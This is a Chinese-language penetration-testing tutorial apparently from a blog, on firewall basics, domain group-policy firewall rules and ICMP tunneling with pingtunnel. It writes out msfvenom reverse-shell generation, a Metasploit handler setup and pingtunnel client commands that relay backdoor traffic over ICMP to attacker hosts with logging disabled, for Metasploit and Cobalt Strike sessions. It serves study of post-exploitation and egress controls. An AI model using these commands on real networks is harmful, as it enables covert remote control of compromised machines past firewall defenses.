内网安全:初探隧道技术
目录
防火墙必备知识
域控-防火墙组策略对象同步
域控 - 防火墙组策略不出网上线
MSF上线
CS - ICMP上线
注意:隧道技术是后渗透手段,是在已经取得权限后的手段
域控-组策略同步
防火墙必备知识
学习防火墙的目标是知道了解防火墙的一些常见配置对内网渗透的影响,并不需要像运维一样全面了解防火墙
参考资料:Windows防火墙限制端口/IP/应用访问的方法以及例外的配置
这是阿里云关于windows运维的文档,里面有常见的winodws防火墙配置
防火墙(Firewall)是一种网络安全设备或软件,用于监控和控制网络流量,以保护计算机和网络免受未经授权的访问、恶意攻击和网络威胁。防火墙通过建立规则和过滤器来管理进出网络的数据流,以确保只有授权的数据能够通过。
防火墙的主要功能包括:
- 包过滤:防火墙检查传入和传出网络的数据包,并根据预定义的规则集来决定是否允许通过。这些规则基于源IP地址、目标IP地址、端口号、协议类型等来过滤数据包。
- 状态检测:防火墙可以追踪网络连接的状态,并仅允许与已建立连接相关的响应数据包通过。这有助于防止未经授权的外部主机访问内部网络。
- 网络地址转换(NAT):防火墙可以执行网络地址转换,将内部私有IP地址转换为公共IP地址,以增强网络安全和隐私。
- 应用程序过滤:一些高级防火墙还可以检查数据包中的应用层信息,例如应用程序协议、有效载荷内容等,以便更精确地控制应用程序级别的访问和流量。
- 虚拟专用网络(VPN)支持:一些防火墙具有VPN功能,可以提供安全的远程访问和加密通信,使远程用户能够安全地连接到内部网络。
通过配置适当的防火墙规则和策略,可以有效保护计算机和网络免受来自互联网和其他网络的潜在威胁。防火墙通常被广泛用于企业网络和个人计算机,作为网络安全的重要组成部分。
关于出站,入站规则:这个出站,入站是针对服务而言的。对于一个Web站点,配置入站规则就是检测访问我们的流量,出站规则就是检测本机出去的流量。
防火墙根据用户不同网络环境有不同的防火墙。比如:
- 主机在域内的规则配置
- 主机对某个目标的规则配置
- 主机对公网的规则配置
在生活中,我们可以运行某个执行程序,系统会提示我们是否允许该应用访问公网网络。
还可以根据具体的协议,端口进行规则设置
还可以针对具体的协议进行出入站限制
有些破解软件的重要一步就是防止软件与外部网络进行连接,就会将该程序的出入站规则全部禁用。
域控-防火墙组策略对象同步
在域中,可以通过组策略对域内所有设备进行配置防火墙规则
新建一个策略进行编辑
这下图进行配置
配置规则
强制执行
域内服务器也可使用命令更新:
gpupdate/force
域成员强制同步DC域防火墙策略
域控 - 防火墙组策略不出网上线
背景介绍:域控通过组策略设置防火墙规则同步后,域内用户主机被限制TCP出网,其中规则为出站规则
你可以Ping通百度,但无法访问百度网页。两个协议不一样!
思路:正向连接&隧道技术
如果是入站被限制呢?反向连接&隧道技术也可以解决
这里将会以ICMP协议为例,ICMP协议是Ping命令走的协议
项目地址:
https://github.com/esrrhs/spp
https://github.com/bdamele/icmpsh
https://github.com/esrrhs/pingtunnel
这里我们实验是模拟DC禁用域成员主机TCP
实战中,TCP封杀的策略:
主机出站TCP封杀 入站无法链接外网
- 采用正向连接:取得一台有网络的能和主机通讯的服务器权限(能连外网)
- 把数据给能出网的机器,通过这台机器进行正向链接控制它
主机出站TCP封杀 入站可以链接外网
- 采用正向连接
- 或者隧道技术:走其它协议出网
这里的实验是把TCP的数据封装到ICMP协议里带出来。因为目标ICMP未被禁止。ICMP隧道技术,在目标服务器中开启脚本负责将后门的TCP流量转入到ICMP协议中,kali中开启脚本负责监听和接受信息
隧道技术对比代理技术:
隧道技术:解决不出网协议上线的问题,利用可出网协议封装
代理技术:解决网络通讯不通的问题,利用跳板机建立节点
这两种操作是已经取得该目标的system权限后,为了把权限移交出来而使用的,实现持久化控制。
MSF上线
MSF生成后门:
注意这里是127.0.0.1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4455 -f exe > msf.exe
将TCP的流量发送到自己的4455端口
MSF启动监听:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
exploit
启动工具,它的作用是把发送ICMP流量还原位TCP流量再被MSF接收
./pingtunnel -type server 需要在目标主机上执行 需要高权限
目标机器上启动工具,执行下面命令:
pingtunnel.exe -type client -l 127.0.0.1:4455 -s 47.94.xx.xx -t 47.94.xx.xx:4444 -tcp 1 -noprint 1 -nolog 1
它可以把本地3333端口接收的TCP流量封装到ICMP协议里面,转发个MSF所在主机。
上线!!!
CS - ICMP上线
配置第一个监听器:
使用这个监听器生成后门
这个后门设置的原因和上面MSF是一样的,不再赘述。
生成第一个监听器
用来接收反弹
攻击机上运行:
./pingtunnel -type server
被攻击机上运行:
pingtunnel.exe -type client -l 127.0.0.1:6666 -s 192.168.46.66 -t 192.168.46.66:7777 -tcp 1 -noprint 1 -nolog 1
之后会在第二个监听器上接收到连接
注意:隧道技术是后渗透手段,是在已经取得权限后的手段
域控-组策略同步
域控进行了设置,所有的域内机器都要受到影响,委派下发
软件安装,密码更改等等
比如:给域内主机设置同一壁纸
壁纸所在目录设置共享
域内主机都能看到
完成设置,查看效果:
内网安全:初探隧道技术相关推荐
- 内网安全:隧道技术详解
目录 隧道技术 反向连接技术 反向连接实验所用网络拓扑图及说明 网络说明 防火墙限制说明 实验前提说明 实战一:CS反向连接上线 - 拿下Win2008 一. 使用转发代理上线创建监听器 二. 上传后 ...
- 【内网安全】隧道技术SSHDNSICMPSMB上线通讯LinuxMac
文章目录 SMB隧道&通讯&上线 ICMP隧道&通讯&上线 DNS隧道&通讯&上线 1.上线环境:内网主机只出网DNS协议数据,解决上线 2.通讯环境: ...
- 内网渗透初探(二) | 重新学习内网渗透全过程
一.前言 前面写了一篇内网渗透初探(一),写的不是特别好,然后也是在学习内网渗透相关的东西,就将其整理了一下,加了自己的思路,写好这篇内网渗透初探(二)- 二.环境介绍 专门做了个拓扑图,首先外网打点 ...
- 内网渗透初探(三) | 查缺补漏
一.前言 从linux打进去到域环境,到获取域控权限.因为前面基本都是在讲windows,这里补一篇linux的,全篇实操,喜欢的小伙伴们快来呀~ 二.外网打点 1.打开站点,很正常的一个登录界面 2 ...
- 内网安全-流量隧道(一)不出网CS上线正反向端口转发
隧道技术概述: 在数据通信被拦截的情况下利用隧道技术封装改变通信协议进行绕过拦截 CS.MSF无法上线,数据传输不稳定无回显,出口数据被监控,网络通信存在问题等 在实际的网络中,通常会通过各种边界设备 ...
- 内网渗透初探(一) | 小白学习内网渗透
0x01 基础知识 内网渗透,从字面上理解便是对目标服务器所在内网进行渗透并最终获取域控权限的一种渗透.内网渗透的前提需要获取一个Webshell,可以是低权限的Webshell,因为可以通过提权获取 ...
- 17、内网渗透测试定位技术总结
0x01 前言 说起内网定位,无论针对内网查找资料还是针对特殊人物都是非常实用的一项技术.这里把目前能够利用的手段&工具都一一进行讲解. 0x02 服务器(机器)定位 收集域以及域内用户信息 ...
- 内网渗透初探(靶场环境搭建+web层面实验+内网基本操作)
靶场环境搭建 在此我使用的是红日安全的环境 下载地址(红日安全) 图片取自互联网,ip地址以实际地址为准 操作系统 IP地址 攻击者 kali IP地址:192.168.3.10 攻击者 Window ...
- 使用电信 TR069 内网架设 WireGuard 隧道异地组网
❝ 本文转自 Steins;Gate,原文:https://www.kryii.com/89.html,版权归原作者所有.欢迎投稿,投稿请添加微信好友:cloud-native-yang TR069 ...
最新文章
- 初学Python,我给你总结了常见的17个错误
- webpack 打包ts项目_使用webpack打包ts
- 5-简单选择排序C实现(递增递减的简单转换)
- freemarker list size问题
- asp.net发送邮件
- Date动态获取时间
- Ubuntu安装摄像头软件GTK_UVC_Viewer
- mysql 12_Navicat for MySQL12免费版
- GDAL读取高程文件,获取经纬度点的高程
- 如何将OFD文件转成Word?教你2种实用方法
- 惠普m1005mfp说明书_惠普M1005使用说明
- 06_标识符的命名规则(笔试)
- java使用ffmpeg完成视频加水印功能
- 乐Pro3 乐视X720/乐视X722通刷官方线刷包_救砖包_解账户锁
- 配置win10系统服务器失败怎么解决,windows10系统重置失败如何解决
- 布道微服务_17服务调用失败的解决方案
- 可靠性测试主要注意点
- vscode打开文件方式小结
- css伪类炫酷迷幻边框
- shell-环境变量以及环境变量的配置文件